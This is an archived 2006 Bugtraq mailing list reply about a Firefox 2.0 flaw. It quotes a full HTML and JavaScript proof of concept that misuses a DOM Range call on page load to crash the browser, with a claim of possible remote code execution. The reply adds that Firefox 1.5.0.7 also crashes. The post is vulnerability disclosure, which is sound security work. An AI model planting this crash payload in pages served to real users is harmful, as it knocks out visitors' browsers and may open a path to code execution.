Home page logo
/

bugtraq logo Bugtraq mailing list archives

Re: New Flaw in Firefox 2.0: DoS and possible remote code execution
From: Gouki <Gouki () GoukiHQ org>
Date: Tue, 31 Oct 2006 19:05:14 +0000

Firefox 1.5.0.7 is also vulnerable (to DoS at least).

On Tue, 2006-10-31 at 09:24 +0000, xxxx () gmail com wrote:
New Flaw in Firefox 2.0: DoS and possible remote code execution

PoC here: http://werterxyz.altervista.org/Firefox2Range.htm

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<script type="text/javascript">
function do_crash()
{
var range;

range = document.createRange();
range.selectNode(document.firstChild);
range.createContextualFragment('<span></span>');
}
</script>
</head>
<body onload="do_crash()">
<p>Good bye Firefox!</p>
</body>
</html>

Attachment: signature.asc
Description: This is a digitally signed message part


  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault